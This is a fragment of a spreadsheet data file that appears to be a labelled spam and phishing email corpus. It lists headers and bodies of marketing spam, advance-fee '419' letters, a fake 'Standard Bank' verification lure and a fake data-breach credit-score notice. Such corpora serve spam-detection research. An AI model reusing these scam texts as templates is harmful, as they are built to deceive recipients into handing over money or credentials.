  </si>
  <si>
    <t>5725</t>
  </si>
  <si>
    <t>To: yyyy-latestdodgydotcomstock@spamassassin.taint.org\nFrom: "Vanessa Lintner" &lt;reply@seekercenter.net&gt;\nDate: Tue, 6 Aug 2002 23:51:01 +0800</t>
  </si>
  <si>
    <t>Tue, 6 Aug 2002 23:51:01 +0800</t>
  </si>
  <si>
    <t>"Vanessa Lintner" &lt;reply@seekercenter.net&gt;</t>
  </si>
  <si>
    <t>yyyy-latestdodgydotcomstock@spamassassin.taint.org</t>
  </si>
  <si>
    <t>I have visited WWW.TAINT.ORG and noticed that ...</t>
  </si>
  <si>
    <t>BAD MSG: PAM: -------------------- Start SpamAssassin results ---------------------- SPAM: This mail is probably spam.  The original message has been altered SPAM: so you can recognise or block similar unwanted mail in future. SPAM: See [URL]http://spamassassin.org[/URL] for more details. SPAM:  SPAM: Content analysis details:   (9.9 hits, 5 required) SPAM: SEARCH_ENGINE_PROMO (2.6 points)  BODY: Discusses search engine listings SPAM: HTML_50_70         (1.0 points)  BODY: Message is 50-70% HTML tags SPAM: REALLY_UNSAFE_JAVASCRIPT (3.3 points)  BODY: Auto-executing JavaScript code SPAM: SUPERLONG_LINE     (0.4 points)  BODY: Contains a line &gt;=199 characters long SPAM: CTYPE_JUST_HTML    (1.7 points)  HTML-only mail, with no text version SPAM: PRIORITY_NO_NAME   (1.0 points)  Message has priority setting, but no X-Mailer SPAM: MSG_ID_ADDED_BY_MTA_3 (0.2 points)  'Message-Id' was added by a relay (3) SPAM: AWL                (-0.3 points) AWL: Auto-whitelist adjustment SPAM:     Hello,                   I have visited [URL]www.taint.org[/URL] and noticed that your website is not listed on some search engines.                   I am sure that through our service the number of people who visit your website will definitely increase. SeekerCenter                    is a unique technology that instantly submits your website                    to over 500,000 search engines and directories                     -- a really low-cost and effective way to advertise your site.                    For more details please go to SeekerCenter.net.                   Give your website maximum exposure today!                   Looking forward to hearing from you. Best                    Regards,                   Vanessa Lintner                   Sales &amp; Marketing  [URL]www.SeekerCenter.net[/URL]</t>
  </si>
  <si>
    <t>http://spamassassin.org www.taint.org www.SeekerCenter.net</t>
  </si>
  <si>
    <t>5733</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "IQ - AIG" &lt;aig@insurancemail.net&gt;\nDate: Tue, 6 Aug 2002 20:10:14 -0400</t>
  </si>
  <si>
    <t>Tue, 6 Aug 2002 20:10:14 -0400</t>
  </si>
  <si>
    <t>"IQ - AIG" &lt;aig@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>9% Commission on MYG Annuities</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_2D6F23_01C23D65.BB2D3AD0 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: quoted-printable  	 When AIG talks annuities...your clients listen!=09  	 Year 1: 8.55% Guaranteed=0A= Year 2-6: 4.55% Guaranteed=09  =09  Commission: 9%=09  	=20 Call or e-mail   us Today!  888-237-4210 ? or ?=20 Please fill out the form below for more information	=20 Name:	  =09 E-mail:	  =09 Phone:	  =09 City:	  	State:	  	 =09  	  	 	   =09 =20 =20  AIG Annuity For agent use only.=20 We don't want anyone to receive our mailings who does not wish to. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.Insurancemail.net[/URL] =20 Legal Notice  =20 ------=_NextPart_000_2D6F23_01C23D65.BB2D3AD0 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable 9% Commission on MYG Annuities =20      =20            =20                  =20                  =20                  =20              =20            Call or e-mail us Today!             — or — =20              =20                  =20                      =20                         Please = fill out the form below for more information =20                         Name:  =20                            =20                         E-mail:  =20                            =20                         Phone:  =20                            =20                         City:  =20                            State:  =20                            =20                            =20                               =20                                          For agent use only.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2D6F23_01C23D65.BB2D3AD0--</t>
  </si>
  <si>
    <t>5717</t>
  </si>
  <si>
    <t>To: zbytcrtimg@takemetothesavings.com\nFrom: betternow54i@now9.takemetothesavings.com\nDate: Tue, 6 Aug 2002 00:50:02 -0400</t>
  </si>
  <si>
    <t>Tue, 6 Aug 2002 00:50:02 -0400</t>
  </si>
  <si>
    <t>betternow54i@now9.takemetothesavings.com</t>
  </si>
  <si>
    <t>zbytcrtimg@takemetothesavings.com</t>
  </si>
  <si>
    <t>ADV: Interest rates slashed! Don't wait!                                                   dnjwn</t>
  </si>
  <si>
    <t>INTEREST RATES HAVE JUST BEEN CUT!!!\n  \n NOW is the perfect time to think about refinancing your home mortgage! Rates are down! Take a minute and fill out our quick online form. \n [URL]http://www.takemetothesavings.com[/URL]\n        \n Easy qualifying, prompt, courteous service, low rates! Don't wait for interest rates to go up again, lock in YOUR low rate now!\n       \n       \n       \n      \n       \n     \n ---------------------------------------\n To unsubscribe, go to: \n [URL]http://www.takemetothesavings.com[/URL]\n Please allow 48-72 hours for removal.</t>
  </si>
  <si>
    <t>http://www.takemetothesavings.com http://www.takemetothesavings.com</t>
  </si>
  <si>
    <t>797</t>
  </si>
  <si>
    <t>To: "Bellamy, Jennifer" &lt;jbellamy@cheo.on.ca&gt;\nFrom: "Bellamy, Jennifer" &lt;jbellamy@cheo.on.ca&gt;\nDate: Tue, 5 Jun 2018 17:05:33 +0000</t>
  </si>
  <si>
    <t>Tue, 5 Jun 2018 17:05:33 +0000</t>
  </si>
  <si>
    <t>"Bellamy, Jennifer" &lt;jbellamy@cheo.on.ca&gt;</t>
  </si>
  <si>
    <t>:::ICT HELP DESK</t>
  </si>
  <si>
    <t>http://www.cheo.on.ca http://www.cheo.on.ca http://www.cheo.on.ca http://www.cheo.on.ca</t>
  </si>
  <si>
    <t>1432</t>
  </si>
  <si>
    <t>To: &lt;jose@monkey.org&gt;\nFrom: Sylvia Quashie &lt;quashie_sylvia@sumsjobz.sbs&gt;\nDate: Tue, 5 Jul 2022 21:06:08 -0400</t>
  </si>
  <si>
    <t>Tue, 5 Jul 2022 21:06:08 -0400</t>
  </si>
  <si>
    <t>Sylvia Quashie &lt;quashie_sylvia@sumsjobz.sbs&gt;</t>
  </si>
  <si>
    <t>You may be involved in a recent data leak</t>
  </si>
  <si>
    <t>You may be involved in a recent data leak Go Here to Check Your Score Today,[URL]http://www.sumsjobz.sbs[/URL] '4854 PEARL CIR Unit 101,  Boulder, Colorado 8o3O1 This message was intended for jose@monkey.org To terminate receiving messages, Go-This-Way,[URL]http://www.sumsjobz.sbs[/URL] 58110600,7211731 Attention Affected Consumers Data Breach Information Below Due to a recent security leak, your name, social security number, birth date, credit-card numbers, and drivers license number may have been compromised. We are directing all users check their CreditScore as soon as possible. For your convenience, we are making the scores available to you today for free. Please check your scores TODAY. Verifying your Report from all 3 Bureaus may help you know if if your data has been compromised. Go Here to Check Your Score Today      Copyright Consumer Protection Co. All rights reserved.       -4854 Pearl. Circle STE l0l,  Bolder, Co. 8o3oI This message was intended for jose@monkey.org To terminate receiving messages, Go-This-Way      58110600,7211731</t>
  </si>
  <si>
    <t>http://www.sumsjobz.sbs http://www.sumsjobz.sbs</t>
  </si>
  <si>
    <t>354</t>
  </si>
  <si>
    <t>To: Recipients &lt;Syna4994@bears.unco.edu&gt;\nFrom: Standard Bank &lt;Syna4994@bears.unco.edu&gt;\nDate: Tue, 4 Oct 2016 10:36:16 -1000</t>
  </si>
  <si>
    <t>Tue, 4 Oct 2016 10:36:16 -1000</t>
  </si>
  <si>
    <t>Standard Bank &lt;Syna4994@bears.unco.edu&gt;</t>
  </si>
  <si>
    <t>Recipients &lt;Syna4994@bears.unco.edu&gt;</t>
  </si>
  <si>
    <t>Standard Bank Upgrade</t>
  </si>
  <si>
    <t>Dear Standard Bank Customer,   Due to the current upgrade in our system your account Needs Verification.   if not Verified within 24 hours, your Account with us will be Suspended.   Click the Below Link to Verify your  Account Now    click here to Update.   Thank you. --- This email has been checked for viruses by Avast antivirus software. [URL]https://www.avast.com[/URL] Dear Standard Bank Customer,  Due to the current upgrade in our system your account Needs Verification. if not Verified within 24 hours, your Account with us will be Suspended. Click the Below Link to Verify your  Account Now  click here to Update. Thank you. 				This email has been checked for viruses by Avast antivirus software. 				[URL]www.avast.com[/URL]</t>
  </si>
  <si>
    <t>2661</t>
  </si>
  <si>
    <t>To: nan\nFrom: Ali Hussein &lt;alihussein07@hotmail.com&gt;\nDate: Tue, 31 Oct 2006 10:49:22 +0100</t>
  </si>
  <si>
    <t>Tue, 31 Oct 2006 10:49:22 +0100</t>
  </si>
  <si>
    <t>Ali Hussein &lt;alihussein07@hotmail.com&gt;</t>
  </si>
  <si>
    <t>GREETINGS IN THE NAME OF ALLAH</t>
  </si>
  <si>
    <t>Salam\n\nI am Mr. Ali Hussein    from  Basra Iraq I am writing you this email as  a \nMuslim brother,\n\nAs you and I know about the unrest in my country, I want to use this means \nto apple for your help to relocate my family and funds (US$4Million ) to \nyour country.\n\nAs I just lost my wife some month ago because of the unrest here in Basra \nand I have my 8months baby with me now.\n\nHope to hear from you\nAssalam ualaikum\n\n_________________________________________________________________\nExpress yourself instantly with MSN Messenger! Download today it's FREE! \n[URL]http://messenger.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>3246</t>
  </si>
  <si>
    <t>To: nan\nFrom: Gary William &lt;stella.sigcau4@virgilio.it&gt;\nDate: Tue, 31 Jul 2007 20:05:05 +0100</t>
  </si>
  <si>
    <t>Tue, 31 Jul 2007 20:05:05 +0100</t>
  </si>
  <si>
    <t>Gary William &lt;stella.sigcau4@virgilio.it&gt;</t>
  </si>
  <si>
    <t>RE BANKING BUSINESS</t>
  </si>
  <si>
    <t>Dear Friend,\n \nLet me start by introducing myself. I am Gary William, \nthe chief Auditor of (Bank Of Scotland.I have an obscured business \nsuggestion for you. One of our accounts with a holding balance of Money \nValued GBP £35,000,000.00 .(Thirty Five Million Pounds only) has been \ndormant and has not been operated for the past six years. \n \n&gt;From my \ninvestigations and confirmations, the owner of this account Mr. Andreas \nSchranner a citizen of Germany who perished in a plane crash [Concorde \nAir Flight AF4590] with the whole passengers aboard on 31 July2000. And \nfor your perusal you can view this web \n\nSite:[URL]http://news.bbc.co[/URL]\nuk/1/hi/world/europe/859479.stm and since then nobody has done anything \nas regards the claiming of this money because he has no family members \nwho are aware of the existence of the account nor the funds.\n\nAlso \nInformation from the National Immigration stated that he was also \nsingle on entry into Scotland.I have secretly discussed this matter \nwith some of the bank officials and we agreed to find a reliable \nforeign partner to deal with.\n \nThis transaction is totally risk and \ntrouble free as the fund is legitimate and does not originate from \ndrugs, money laundering, terrorism or any other illegal act. \n \nThe \nsharing of the fund between us, is as follows; 40% of the total sum \nwill go to you for your effort and commitment to the success of this \ntransaction. 60% for me and my colleague's. \n \n \nTelephone: \n+447024079712\nGary William\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>4644</t>
  </si>
  <si>
    <t>To: "3441@earthlink.net" &lt;3441@earthlink.net&gt;\nFrom: "adfer@yahoo.com" &lt;adfer@yahoo.com&gt;\nDate: Tue, 31 Jul 2001 23:15:51 +0000 (Eire)</t>
  </si>
  <si>
    <t>Tue, 31 Jul 2001 23:15:51 +0000 (Eire)</t>
  </si>
  <si>
    <t>"adfer@yahoo.com" &lt;adfer@yahoo.com&gt;</t>
  </si>
  <si>
    <t>"3441@earthlink.net" &lt;3441@earthlink.net&gt;</t>
  </si>
  <si>
    <t>WE PAY CASH, NOW!</t>
  </si>
  <si>
    <t>We are Trans World Funding, providing immediate CASH for your business and personal needs.\n\nVisit us at http://www.tfund2000.,com\n\nWe pay cash for military, government or VA pensions.\nWe provide a health plan, including  dental, vision care, prescription drugs and chiropractic service.\nLack of working capital?  We can bring in cash...now.\nWe can guarantee credit approval for merchant accounts.\nWe provide cash even with bad or no credit to keep your business growing.\nWe pay cash for uncollectables.\nOur investors specialize in collecting unpaid bills.\nGet a lump sum of cash for structured settlements or annuities.\nCash in your lottery winnings... now.\nWe purchase commercial and residential mortgages, we pay top dollar!\nWe can purchase your life insurance policy for a lump sum of cash... now. \n\nTo learn more about our company and all our services,  please visit us at:\n\n[URL]http://www.tfund2000.com[/URL]\n\n\n\nTo be removed from our mailinf list send a blank email with the word remove in the subject line.\nThank you and have a great day!</t>
  </si>
  <si>
    <t>http://www.tfund2000.com</t>
  </si>
  <si>
    <t>4642</t>
  </si>
  <si>
    <t>To: &lt;yyyy@netnoteinc.com&gt;\nFrom: "NetProfits" &lt;netprohkg@hotmail.com&gt;\nDate: Tue, 31 Jul 2001 15:30:25 +0700</t>
  </si>
  <si>
    <t>Tue, 31 Jul 2001 15:30:25 +0700</t>
  </si>
  <si>
    <t>"NetProfits" &lt;netprohkg@hotmail.com&gt;</t>
  </si>
  <si>
    <t>100% Risk-FREE Way To Explosive Profits !</t>
  </si>
  <si>
    <t>Hi jm@netnoteinc.com, Are you ready to hear the cold hard facts about internet marketing? [URL]http://BulletProofMarketing.Does.It[/URL] The TRUTH is sometimes hard to swallow and is in VERY short supply on the internet! Now you can put this to an end and RETIRE in 6 months! * Want to make $5,000/mo. within 60 days using proven     methods that work? NO BULL! * Tired of KILLING yourself promoting programs that pay     just once? * Want to make MORE and MORE while you do LESS and LESS? * Want to live worry free while THOUSANDS of other people     build YOUR business? * Want to send out 20,000 TARGETED up-to-date emails DAILY? Click here when you're ready for some real money!  [URL]http://BulletProofMarketing.Does.It[/URL] Don't be left behind... ACT NOW! Sincerely,  NetProMarketing Direct Consulting for the home-biz entrepreneurial type. AOL Members Click  Here _________________________________________________ Disclaimer ======= Thanks for reading this review - it'll be beneficial to your  online marketing efforts!  Anyways, should you, jm@netnoteinc.com,  have received this message by mistake, just hit 'Reply'  and put 'REMOVE' in the subject line. Enjoy your prosperity ! _________________________________________________</t>
  </si>
  <si>
    <t>http://BulletProofMarketing.Does.It http://BulletProofMarketing.Does.It</t>
  </si>
  <si>
    <t>4641</t>
  </si>
  <si>
    <t>To: yyyy7@netnoteinc.com\nFrom: winafreevacation@hotmail.com\nDate: Tue, 31 Jul 2001 05:44:04</t>
  </si>
  <si>
    <t>Tue, 31 Jul 2001 05:44:04</t>
  </si>
  <si>
    <t>winafreevacation@hotmail.com</t>
  </si>
  <si>
    <t>yyyy7@netnoteinc.com</t>
  </si>
  <si>
    <t>You have been specially selected to qualify for the following:\n\nPremium Vacation Package and Pentium PC Giveaway\nTo review the details of the please click on the link \nwith the confirmation number below:\n\n[URL]http://www.1chn.net[/URL]\n\nConfirmation Number#Lh340\nPlease confirm your entry within 24 hours of receipt of this confirmation.\n\nWishing you a fun filled vacation!\nIf you should have any additional questions or cann't connect to the site \ndo not hesitate to contact me direct:\nmailto:vacation@btamail.net.cn?subject=Help!</t>
  </si>
  <si>
    <t>http://www.1chn.net</t>
  </si>
  <si>
    <t>4640</t>
  </si>
  <si>
    <t>To: o9njr103@hotmail.com\nFrom: j9m11ep@aol.com\nDate: Tue, 31 Jul 2001 04:30:57 GMT</t>
  </si>
  <si>
    <t>Tue, 31 Jul 2001 04:30:57 GMT</t>
  </si>
  <si>
    <t>j9m11ep@aol.com</t>
  </si>
  <si>
    <t>o9njr103@hotmail.com</t>
  </si>
  <si>
    <t>E-Business                                         [jdnhd]</t>
  </si>
  <si>
    <t>HOW TO SUBSTANTIALLY INCREASE SALES:\n\nEasily accept major credit cards right away!\n\n===========================================\nSubmit the following via email to receive more information.\nOr vist our online submition\n[URL]http://usuarios.tripod.es[/URL]\nNAME:\nPHONENUMBER:\nAND BEST TIME TO CALL:\n===========================================\n\nMerchant Status will help you increase sales by an\nincredible 50% to 100%. Stop losing valuable sales!\n\nWith one phone call you can be:\n\nAccepting all major credit cards!\nAccepting checks over the net or by Fax!\nAccepting real time processing for member sites!\nGaining custumer loyalty and trust!\n\nClose the sale now. No more wondering if "The check\nis in the mail"\n\nWe specialize in helping businesses who\nare just starting out with no credit, poor credit, or\neven if you have great credit.\n\nAlmost everyone is approved!\n\n===========================================\nSubmit the following via email to receive more information.\nNAME:\nPHONENUMBER:\nAND BEST TIME TO CALL:\n===========================================\n\n\n\n\n\n\n\n\n\n\n\n\n\nTo be taken off the list type remove in the subject line.</t>
  </si>
  <si>
    <t>http://usuarios.tripod.es</t>
  </si>
  <si>
    <t>4639</t>
  </si>
  <si>
    <t>To: oyqvt@hotmail.com\nFrom: 3pmsrdur@aol.com\nDate: Tue, 31 Jul 2001 04:28:31 GMT</t>
  </si>
  <si>
    <t>Tue, 31 Jul 2001 04:28:31 GMT</t>
  </si>
  <si>
    <t>3pmsrdur@aol.com</t>
  </si>
  <si>
    <t>oyqvt@hotmail.com</t>
  </si>
  <si>
    <t>E-Business                                         [c2971]</t>
  </si>
  <si>
    <t>HOW TO SUBSTANTIALLY INCREASE SALES:\n\nEasily accept major credit cards right away!\n\n===========================================\nSubmit the following via email to receive more information.\nOr vist our online submition\n[URL]http://utenti.tripod.it[/URL]\nNAME:\nPHONENUMBER:\nAND BEST TIME TO CALL:\n===========================================\n\nMerchant Status will help you increase sales by an\nincredible 50% to 100%. Stop losing valuable sales!\n\nWith one phone call you can be:\n\nAccepting all major credit cards!\nAccepting checks over the net or by Fax!\nAccepting real time processing for member sites!\nGaining custumer loyalty and trust!\n\nClose the sale now. No more wondering if "The check\nis in the mail"\n\nWe specialize in helping businesses who\nare just starting out with no credit, poor credit, or\neven if you have great credit.\n\nAlmost everyone is approved!\n\n===========================================\nSubmit the following via email to receive more information.\nNAME:\nPHONENUMBER:\nAND BEST TIME TO CALL:\n===========================================\n\n\n\n\n\n\n\n\n\n\n\n\n\nTo be taken off the list type remove in the subject line.</t>
  </si>
  <si>
    <t>http://utenti.tripod.it</t>
  </si>
  <si>
    <t>898</t>
  </si>
  <si>
    <t>To: "Business Owner" &lt;jose@monkey.org&gt;\nFrom: "Katie Marshall via DocuSign" &lt;dse_NA3@docusign.net&gt;\nDate: Tue, 30 Oct 2018 06:22:01 -0700</t>
  </si>
  <si>
    <t>Tue, 30 Oct 2018 06:22:01 -0700</t>
  </si>
  <si>
    <t>"Katie Marshall via DocuSign" &lt;dse_NA3@docusign.net&gt;</t>
  </si>
  <si>
    <t>"Business Owner" &lt;jose@monkey.org&gt;</t>
  </si>
  <si>
    <t>Funding Approval Today</t>
  </si>
  <si>
    <t>Hello Business Owner, Katie Marshall has sent you a new DocuSign document to view and sign. Please click on the link below to begin signing. Hello, we are now advertising our terms up to 18 months with weekly payment options, unsecured capital with 0 credit requirement. We are The My Cash Capital representing Critical Financing and we can have you approved within minutes. APPLY NOW with Critical Financing to see what you are approved for. What are the Requirements? In order to approve your business, we need the completed Docusign application along with the last 6 months of your business bank statements to fully approve your file. Please note, there is no cost to apply with our company as our approvals are completely free. If you have trouble attaching statements to the application you can fax them directly to 516-331-0696. Speak with an approval manager now! Direct Line: 516-331-0687 Critical Financing Approval Department [URL]www.criticalfi.com[/URL] 329 S. Oyster Bay Road  #517 Plainview, NY 11803 *Please note this email is to advertise our funding options for your business. If you would like to be taken off our mailing listing simply click here  to unsubscribe. UNSUBSCRIBE BELOW Unsubscribe: [URL]https://criticalfinance.wufoo.com[/URL] Thank you.      REVIEW DOCUMENT [URL]https://na3.docusign.net[/URL] If clicking the link does not work, you can highlight and copy the entire line above and paste it into your browser to get started. This message was sent to you by Katie Marshall who is using the DocuSign Electronic Signature Service. If you would rather not receive email from this sender you may contact the sender with your request. Do Not Share This Email This email contains a secure link to DocuSign. Please do not share this email, link, or access code with others. Questions about the Document? If you need to modify the document or have questions about the details in the document, please reach out to the sender by emailing them directly. If you are having trouble signing the document, please visit the Help with Signing page on our Support Center. [URL]https://support.docusign.com[/URL] EnvelopeActivation Katie Marshall sent you a document to review and sign.  REVIEW DOCUMENT  Katie Marshall katie@mycashcapital.comHello, we are now advertising our terms up to 18 months with weekly payment options, unsecured capital with 0 credit requirement. We are The My Cash Capital representing Critical Financing and we can have you approved within minutes. APPLY NOW with Critical Financing to see what you are approved for. What are the Requirements? In order to approve your business, we need the completed Docusign application along with the last 6 months of your business bank statements to fully approve your file. Please note, there is no cost to apply with our company as our approvals are completely free. If you have trouble attaching statements to the application you can fax them directly to 516-331-0696. Speak with an approval manager now! Direct Line: 516-331-0687 Critical Financing Approval Department [URL]www.criticalfi.com[/URL] 329 S. Oyster Bay Road  #517 Plainview, NY 11803 *Please note this email is to advertise our funding options for your business. If you would like to be taken off our mailing listing simply click here  to unsubscribe. UNSUBSCRIBE BELOW Unsubscribe: [URL]https://criticalfinance.wufoo.com[/URL] Thank you.Do Not Share This Email This email contains a secure link to DocuSign. Please do not share this email, link, or access code with others.Alternate Signing Method Visit DocuSign.com, click 'Access Documents', and enter the security code: 1100909CE258423C9156696C45046E2B3 About DocuSign Sign documents electronically in just minutes. It's safe, secure, and legally binding. Whether you're in an office, at home, on-the-go -- or even across the globe -- DocuSign provides a professional trusted solution for Digital Transaction Management™. Questions about the Document? If you need to modify the document or have questions about the details in the document, please reach out to the sender by emailing them directly. If you are having trouble signing the document, please visit the Help with Signing page on our Support Center.Download the DocuSign AppThis message was sent to you by Katie Marshall who is using the DocuSign Electronic Signature Service. If you would rather not receive email from this sender you may contact the sender with your request.</t>
  </si>
  <si>
    <t>www.criticalfi.com https://criticalfinance.wufoo.com https://na3.docusign.net https://support.docusign.com www.criticalfi.com https://criticalfinance.wufoo.com</t>
  </si>
  <si>
    <t>5622</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "" &lt;dylan6830@msn.com&gt;\nDate: Tue, 30 Jul 2002 19:49:21 -0400</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 19:49:21 -0400</t>
  </si>
  <si>
    <t>"" &lt;dylan6830@msn.com&gt;</t>
  </si>
  <si>
    <t>Time Share</t>
  </si>
  <si>
    <t>Interested in Renting or Selling your\nTimeshare or Vacation Membership?\n \nWe can help!\n \nFor a FREE consultation, simply reply\nwith your name and telephone number.\nAlso include the name of your resort.\nWe will be in touch with you shortly!\n \n	     Have a great day!  \n\nRemoval instructions:\n*************************\nTo be removed from this list please reply with "remove" in the subject.\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>5621</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "IQ - National Travelers" &lt;nt@insurancemail.net&gt;\nDate: Tue, 30 Jul 2002 19:00:55 -0400</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 19:00:55 -0400</t>
  </si>
  <si>
    <t>"IQ - National Travelers" &lt;nt@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>15 Ways to Collect on a Life Policy</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_14C159_01C237E6.C5B22F30 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  The Non-Death Life Policy  Critical Illness Life Insurance     This is not a terminal illness policy!	  15 Valuable Lifetime Benefits 100% of the Face Amount	  Heart Attack	 Stroke	 Invasive Cancer	 HIV (for Medical Personnel)	  Paralysis	 Organ Transplant	 Severe Burns	 Loss of Independent Living	  Terminal Illness	 Kidney Failure	 Blindness	 Death By Any Cause	   	 25% of the Face Amount	  Coronary Artery Bypass	 Non-invasive Cancer	   	 10% of the Face Amount	  Coronary Angioplasty	    Worksite Marketing	 Individual Sales	   	 	 ? Guaranteed Issue for Groups of 25+	 ? Up to $1,000,000 maximum ? Electronic Enrollment	 ? Simplified Issue up to $100,000	  ? Unlimited billing options	 ? Commission advance available	      Don't forget to ask about our matching retirement plan!	 To learn more, please call us today!  800-626-7980 ? or ? 	 Please fill out the form below for more information	  Name:	  	 Address:	  	 City:	  	State:	  	Zip:	  	 E-mail:	  	 Phone:	  	 Area of Interest:	  Worksite        Individual Sales 	 Both 	  	  Personal Producer      Manager 	 Number of Agents 	  	  	  	  	 	   	    National Traveler's Life Co.	 We don't want anyone to receive our mailings who does not wish to. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.Insurancemail.net[/URL]   Legal Notice    ------=_NextPart_000_14C159_01C237E6.C5B22F30 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable 15 Ways to Collect on a Life Policy =20      =20            =20            =20              =20                 100% of the Face = Amount =20                 Heart = Attack Stroke Invasive = Cancer HIV (for Medical = Personnel) =20                 Paralysis Organ Transplant Severe Burns Loss of Independent = Living =20                 Terminal Illness Kidney Failure Blindness Death By Any = Cause =20                  =20                 25% of the Face = Amount =20                 Coronary Artery = Bypass Non-invasive = Cancer =20                  =20                 10% of the Face Amount =20                 Coronary = Angioplasty               =20                 Worksite Marketing Individual Sales =20                  =20                 • Guaranteed Issue for Groups of = 25+ • Up to $1,000,000 = maximum =20                 • Electronic = Enrollment • Simplified Issue up to = $100,000 =20                 • Unlimited billing = options • Commission advance = available   =20            =20            To = learn more, please call us today!             — or — =20           =20              =20                  =20                      =20                         Please fill out the form below for more = information =20                         Name: =20                            =20                         Address: =20                            =20                         City: =20                            State: =20                            Zip: =20                            =20                         E-mail: =20                            =20                         Phone: =20                            =20                         Area of Interest: =20                           =20                                                      Worksite      =20                                                      Individual Sales =20                          =20                           =20                                                      Both =20                          =20                            =20                                                      Personal Producer    =20                                                      Manager =20                          =20                           =20                                                      Number of Agents =20                          =20                           =20                           =20                              =20                            =20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14C159_01C237E6.C5B22F30--</t>
  </si>
  <si>
    <t>5619</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com\nFrom: suddenlysusan@Stoolmail.zzn.com ()\nDate: Tue, 30 Jul 2002 17:07:56 -0400</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 17:07:56 -0400</t>
  </si>
  <si>
    <t>suddenlysusan@Stoolmail.zzn.com ()</t>
  </si>
  <si>
    <t>Best Price on the netf5f8m1</t>
  </si>
  <si>
    <t>(suddenlysusan@Stoolmail.zzn.com) on Tuesday, July 30, 2002 at 17:07:56\n: Why Spend upwards of $4000 on a DVD Burner when we will show you an alternative that will do the exact same thing for just a fraction of the cost? Copy your DVD's NOW. Best Price on the net. Click here: [URL]http://002@www.dvdcopyxp.com[/URL] Click to remove [URL]http://003@www.spambites.com[/URL]</t>
  </si>
  <si>
    <t>http://002@www.dvdcopyxp.com http://003@www.spambites.com</t>
  </si>
  <si>
    <t>5618</t>
  </si>
  <si>
    <t>To: fkd@hotmail.com\nFrom: &lt;mis43@planetinternet.be&gt;\nDate: Tue, 30 Jul 2002 14:02:20 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 14:02:20 -0400 (EDT)</t>
  </si>
  <si>
    <t>&lt;mis43@planetinternet.be&gt;</t>
  </si>
  <si>
    <t>fkd@hotmail.com</t>
  </si>
  <si>
    <t>HELP WANTED. WORK FROM HOME. FREE INFO</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lotsonet.com[/URL]\n\nand fill out our info form.  NO EXPERIENCE REQUIRED, WE WILL TRAIN YOU.\nNO COMMITTMENT IS REQUIRED BY FILLING OUT THE FORM, IT IS FOR INFO\nONLY.\n\n[URL]http://www.lotsonet.com[/URL]\n\nYou want to be independent?  THEN MAKE IT HAPPEN!\nHAPPEN!\n\nSIMPLY CLICK ON THE LINK BELOW FOR FREE, NO OBLIGATED INFORMATION!\nGUARANTEED!\n\n[URL]http://www.lotsonet.com[/URL]\n\n\nTo be removed from our link simple go to:\n\n[URL]http://www.lotsonet.com[/URL]\n\n\n96l2</t>
  </si>
  <si>
    <t>5609</t>
  </si>
  <si>
    <t>To: &lt;yyyy@netnoteinc.com&gt;\nFrom: "SQLCare, Inc." &lt;Unsubscribe@sqlcare.com&gt;\nDate: Tue, 30 Jul 2002 13:29:51</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 13:29:51</t>
  </si>
  <si>
    <t>"SQLCare, Inc." &lt;Unsubscribe@sqlcare.com&gt;</t>
  </si>
  <si>
    <t>Hassle-Free Microsoft SQL Server Remote Database Administration</t>
  </si>
  <si>
    <t xml:space="preserve">  \n  \n![]([URL]http://www.sqlcare.com[/URL]  \n![]([URL]http://www.sqlcare.com[/URL]  \n![]([URL]http://www.sqlcare.com[/URL]  \n![]([URL]http://www.sqlcare.com[/URL]  \n![]([URL]http://www.sqlcare.com[/URL]  \n![]([URL]http://www.sqlcare.com[/URL]  \n![]([URL]http://www.sqlcare.com[/URL]  \n![]([URL]http://www.sqlcare.com[/URL]\n\n|\n\n![]([URL]http://www.sqlcare.com[/URL]\n\n|\n\n![]([URL]http://www.sqlcare.com[/URL]  \n  \n![]([URL]http://www.sqlcare.com[/URL]\n\n|\n\n**visit us at [URL]www.sqlcare.com[/URL]** **  \nor call us at (214) 740.0923**\n\n  \n  \n---  \n  \n  \nTo be Removed, reply with REMOVE in the subject line.\n\n</t>
  </si>
  <si>
    <t>http://www.sqlcare.com http://www.sqlcare.com http://www.sqlcare.com http://www.sqlcare.com http://www.sqlcare.com http://www.sqlcare.com http://www.sqlcare.com http://www.sqlcare.com http://www.sqlcare.com http://www.sqlcare.com http://www.sqlcare.com www.sqlcare.com</t>
  </si>
  <si>
    <t>5617</t>
  </si>
  <si>
    <t>To: #recipient#@netnoteinc.com\nFrom: ISSAC &lt;ABNER@earthlink.net&gt;\nDate: Tue, 30 Jul 2002 12:46:57 -0500</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 12:46:57 -0500</t>
  </si>
  <si>
    <t>ISSAC &lt;ABNER@earthlink.net&gt;</t>
  </si>
  <si>
    <t>#recipient#@netnoteinc.com</t>
  </si>
  <si>
    <t>Telecom Consolidation Begins to Accelerate.................... owwra</t>
  </si>
  <si>
